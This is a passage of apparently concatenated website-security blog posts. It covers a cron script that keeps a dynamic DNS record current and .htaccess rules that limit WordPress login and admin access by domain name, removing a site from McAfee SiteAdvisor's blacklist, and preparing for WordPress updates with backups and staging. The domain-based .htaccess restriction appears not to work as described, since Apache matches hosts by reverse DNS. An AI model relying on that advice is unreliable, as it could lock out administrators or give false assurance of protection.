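If you’d rather not click the link by hand every time, a small cron job can do it for you. The sketch below is assumption-laden: the Direct URL is a placeholder for the one you saved from Afraid.org, and icanhazip.com stands in for any what’s-my-IP service. It only hits the update URL when your public IP actually changes:

```shell
#!/bin/sh
# Sketch: keep a freedns.afraid.org record current from cron.
# DIRECT_URL is a placeholder -- paste in the Direct URL you saved.
DIRECT_URL="${DIRECT_URL:-https://freedns.afraid.org/dynamic/update.php?YOUR_TOKEN}"
CACHE="${CACHE:-/tmp/last_ip}"

# Look up the current public IP (falls back to "unknown" if offline).
CURRENT_IP="${CURRENT_IP:-$(curl -s --max-time 5 https://icanhazip.com || echo unknown)}"

if [ "$CURRENT_IP" != "$(cat "$CACHE" 2>/dev/null)" ]; then
    # IP changed: hit the Direct URL so the domain points at the new IP.
    curl -s --max-time 5 "$DIRECT_URL" > /dev/null 2>&1 || true
    echo "$CURRENT_IP" > "$CACHE"
    echo "record updated to $CURRENT_IP"
else
    echo "ip unchanged"
fi
```

Run it from cron every few minutes (e.g. `*/5 * * * * /path/to/update-dyndns.sh`) and the record, and therefore your .htaccess rules, follow your IP around.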

Step 5. Update .HTACCESS

Now that you have set up a domain to correspond with your machine, it’s on you to go back into your code editor and update it to filter not by IP, but by domain.

So looking at the recommendations above, they would now look something like the following:

Protecting wp-login.php:

#Secure Access to WP-LOGIN.PHP by Domain Name
<Files wp-login.php>
Order Deny,Allow
Deny from All
Allow from testsubdomain.mooo.com
</Files>

Protecting WP-ADMIN Directory:

#Secure Access to WP-ADMIN by Domain Name
<FilesMatch ".*">
Order Deny,Allow
Deny from All
Allow from testsubdomain.mooo.com
</FilesMatch>

Couple Important Take-Aways


First, this is a really easy way to save money, better secure access to your administrator panel, and better handle dynamic IPs.

Second, this will work with any machine you have. If you are like me and have several machines, this is key. I have a desktop that I use at home, one that I travel with, and several others that I test on. This gives me the flexibility to be as mobile as I need to be. Whether in Canada, the US, or Brazil, I am always able to access my information by updating the IP for the domain.

Third, this now becomes as crucial a piece of information as your username and password. Do not share your link and/or domain name. Treat your access to the DNS Manager as important; ensure you’re following good practices for creating and managing your access credentials.

Fourth, although I talk specifically about WordPress, this is something that can be applied to a wide array of authentication needs. It can be used internally to restrict FTP, SFTP, and SSH access, and it can also be used on any number of available CMSs.


As always, feel free to contact us or comment if you have any questions or concerns. You can always email us at info@sucuri.net

How To: Remove McAfee SiteAdvisor Blacklisting

As more and more blacklisting authorities come online it becomes important to understand how to go about submitting your site for a review. The most recent challenge has been figuring out how to go about getting a site off the McAfee SiteAdvisor solution.

You can read more about what SiteAdvisor is here: http://www.siteadvisor.com/howitworks/index.html

What’s really important to note is that we have recently started leveraging their API in our own SiteCheck. So if you scan your site and it shows BLACKLISTED, it’s always good to click on the Blacklisting Status tab. The tab will show you an image similar to the one found here:

When blacklisted, the blacklisting authority will be highlighted in RED in the image above.

Please do note that as we use their API, we have to wait for it to be updated before the change will reflect in our scans, the same as most other scanners leveraging similar APIs.

The Process

1. Verify Clean

So obviously, the very first step is to make sure the site is clean. Not doing so will just lead to very high levels of frustration. Can it be a false positive? Yup, sure can. But if you submit continuously and they respond with no update, then you might have a problem.

Yes, even if the other authorities haven’t flagged it. If there were one provider that covered 100% of the spectrum, well then there wouldn’t be any need for anyone else.

2. Submitting For Review

This is perhaps the most challenging part we found. Unlike Google and Bing, or even Norton, there is no webmaster-tools-like solution. At least none that we can find. But there is this very hidden link that you have to go searching for: http://www.siteadvisor.com/userfeedback.html

At first glance it doesn’t look like much, just a random form, but there is one drop-down of particular interest, Type of Inquiry. You’re going to want to choose the Submit a site for (re)testing option. I know, not very eloquent, but it seems to be the preferred method.

I’m still confused about the UserID: option, so we just leave it blank. Be sure to fill in the Your Name and Your E-mail fields, though, so that they have a way to contact you.

Turnaround Time

Like most authorities, we’re seeing a 3 to 4 day turnaround on average. Trust me when I say I wish it were faster, but it’s not, so be patient.


If you have any additional questions please contact us at info@sucuri.net.

3 Easy Steps to Make WordPress Updates Safer

With the release of WordPress 3.4 inching closer (could be minutes), we wanted to put together a quick post to help you towards a successful update.

WordPress

Here are a few areas to help you prepare for an easy update to the latest and greatest version of WordPress:

1. Backup your website

Updates in WordPress these days are easy and should be part of your management plan. This doesn’t apply just to WordPress core, but also to your plugins and themes. You want to make sure that you have clean backups of all these files in the event that something goes wrong during an update.

Some hosting providers provide backup mechanisms, but you may be looking for something a bit more manageable and flexible.
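If you’re comfortable in a terminal, the core of a backup is nothing more than archiving the files and dumping the database. A minimal sketch follows; the paths are assumptions (a throwaway demo directory is created so it runs as-is; point SITE_DIR at your real WordPress root), and the database dump is left as a commented line with placeholder credentials:

```shell
#!/bin/sh
# Minimal manual backup sketch. SITE_DIR would be your WordPress root
# (e.g. ~/public_html); a demo directory is created here so it runs as-is.
SITE_DIR="${SITE_DIR:-/tmp/demo_site}"
BACKUP_DIR="${BACKUP_DIR:-/tmp/backups}"
mkdir -p "$SITE_DIR/wp-content" "$BACKUP_DIR"
echo "<?php // demo" > "$SITE_DIR/wp-content/index.php"

STAMP=$(date +%Y%m%d-%H%M%S)
# Archive everything: core, themes, plugins, uploads.
tar -czf "$BACKUP_DIR/files-$STAMP.tar.gz" -C "$(dirname "$SITE_DIR")" "$(basename "$SITE_DIR")"
# The database dump would look like this (placeholder credentials):
# mysqldump -u DB_USER -p DB_NAME | gzip > "$BACKUP_DIR/db-$STAMP.sql.gz"
echo "backup written: $BACKUP_DIR/files-$STAMP.tar.gz"
```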

A good premium solution that takes the pain out of backups is the popular plugin BackupBuddy.

BackupBuddy

BackupBuddy will enable you to back up your entire WordPress installation, including widgets, themes, plugins, and your database. You have multiple options for off-site storage of your backups, and scheduling backups becomes a cinch.

If anything goes bananas, BackupBuddy includes restore capabilities that will have you back up and running very quickly.

2. Research your plugins and themes

One of the reasons we often hear as to why a site manager refuses to update, or has major concerns with updating, is that they have had issues with their themes and/or plugins breaking at update time. Valid concern!

There are ways to mitigate these types of issues. The first thing to do after you have backed up your website is a little research.

  1. Check your plugins and themes to see what version of WordPress they are compatible with.
  2. Is your theme or plugin being actively maintained? Not sure? Contact the author/developer to see if it is compatible with the latest or upcoming release candidate.
  3. Read reviews to see if anyone else is having issues. This may help you make decisions around how you upgrade, and how that plugin/theme fits into your future plans.

The awesome thing about WordPress is that there are a ton of alternatives for just about any functionality you want to plug into your website. You shouldn’t loosen your security posture for functionality; there’s always a way!

3. Test in staging

The worst thing you can do, especially if you have a highly trafficked WordPress site, is to not test the update. It’s real easy to miss something, and the next thing you know, the entire site may be affected.

So you have backed up your site, you have vetted your plugins and themes, everything is awesome. The next step is to set up a staging or development environment to test in. Build a sub-domain with a replica of your production WordPress site; it is easy to do in most hosting environments, and since you have backups of your site, it’ll be painless to get that stuff into the staging site :)
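The file side of that staging copy can be as simple as a recursive copy into the sub-domain’s docroot. A sketch, with demo paths so it runs as-is (on a real host, PROD and STAGE would be your live and staging docroots, and you’d load a database dump as well):

```shell
#!/bin/sh
# Sketch: clone the live files into a staging docroot (demo paths here).
PROD="${PROD:-/tmp/prod_site}"
STAGE="${STAGE:-/tmp/staging_site}"
mkdir -p "$PROD/wp-content"
echo "<?php // demo" > "$PROD/index.php"

# Copy files into staging; on a real host this would be cp -R (or rsync)
# from the live docroot into the sub-domain's docroot.
rm -rf "$STAGE"
cp -R "$PROD" "$STAGE"

# You'd then load a fresh DB dump and point staging's wp-config.php at a
# staging database, e.g.: mysql -u DB_USER -p STAGE_DB < db-backup.sql
echo "staging copy ready at $STAGE"
```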

Now you have free rein to update in staging; check everything, make sure that nothing breaks, and that you have a warm fuzzy that all is well. Once you’ve tested, pick a slow-traffic time and make the update.


None of this is rocket science of course, but in the end, we all forget steps sometimes.

Have anything to add? Are there any other crucial steps that you take to mitigate the risk of experiencing a bad WordPress update?

Let us know, we’d love to hear!